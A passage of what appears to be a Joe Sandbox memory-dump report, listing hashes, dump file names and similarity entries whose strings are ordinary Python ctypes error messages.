                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0F2121A5B0964792EF549F9DD4503B82760EF94FC5F68403ACB4D47261DF2CE984C350
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2282859604.00007FF8BFB71000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF8BFB70000, based on PE: true
• Associated: 00000015.00000002.2282778148.00007FF8BFB70000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000015.00000002.2282989797.00007FF8BFB81000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000015.00000002.2283049234.00007FF8BFB88000.00000004.00000001.01000000.00000010.sdmp
• Associated: 00000015.00000002.2283159307.00007FF8BFB8C000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff8bfb70000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CharErr_FormatUnicode_Wide
                                                                                                                                                                                                                          • String ID: string too long (%zd, maximum length %zd)$unicode string expected instead of %s instance
                                                                                                                                                                                                                          • API String ID: 2195588020-2061977717
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Dealloc$Arg_FromLongLong_ParseTuple
                                                                                                                                                                                                                          • String ID: OO:CopyComPointer
                                                                                                                                                                                                                          • API String ID: 1908940310-822416302
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Err_Long$Long_MaskOccurredStringSubtypeType_Unsigned
                                                                                                                                                                                                                          • String ID: int expected instead of float
                                                                                                                                                                                                                          • API String ID: 3681780221-2411840549
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Err_$LongLong_MaskOccurredStringSubtypeType_Unsigned
                                                                                                                                                                                                                          • String ID: int expected instead of float
                                                                                                                                                                                                                          • API String ID: 2539109060-2411840549
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • bytes or integer address expected instead of %s instance, xrefs: 00007FF8BFB77033
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Long$Bytes_Err_FormatLong_MaskStringUnsigned
                                                                                                                                                                                                                          • String ID: bytes or integer address expected instead of %s instance
                                                                                                                                                                                                                          • API String ID: 1546367030-706233300
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Err_LongLong_MaskStringUnicode_Unsigned
                                                                                                                                                                                                                          • String ID: function name must be string, bytes object or integer
                                                                                                                                                                                                                          • API String ID: 2115587880-3177123413
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Err_$Long_OccurredStringVoid
                                                                                                                                                                                                                          • String ID: integer expected
                                                                                                                                                                                                                          • API String ID: 1621529885-2140524511
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2282859604.00007FF8BFB71000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Err_StringSubtypeType_
                                                                                                                                                                                                                          • String ID: not a ctype instance
                                                                                                                                                                                                                          • API String ID: 468607378-3181906287
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2282859604.00007FF8BFB71000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Dict_Err_ItemString
                                                                                                                                                                                                                          • String ID: abstract class
                                                                                                                                                                                                                          • API String ID: 960913676-1623945838
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2282859604.00007FF8BFB71000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Dict_Err_ErrorItemOccurredWith
                                                                                                                                                                                                                          • String ID: getting _needs_com_addref_
                                                                                                                                                                                                                          • API String ID: 2359299079-4140119658
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2282859604.00007FF8BFB71000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Err_StringSubtypeType_
                                                                                                                                                                                                                          • String ID: invalid type
                                                                                                                                                                                                                          • API String ID: 468607378-446110543
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2282859604.00007FF8BFB71000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Err_$OccurredString
                                                                                                                                                                                                                          • String ID: PyObject is NULL
                                                                                                                                                                                                                          • API String ID: 114435612-3221357749
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2282859604.00007FF8BFB71000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Capsule_FreeMem_Pointer
                                                                                                                                                                                                                          • String ID: _ctypes/cfield.c pymem
                                                                                                                                                                                                                          • API String ID: 1268649101-2578739719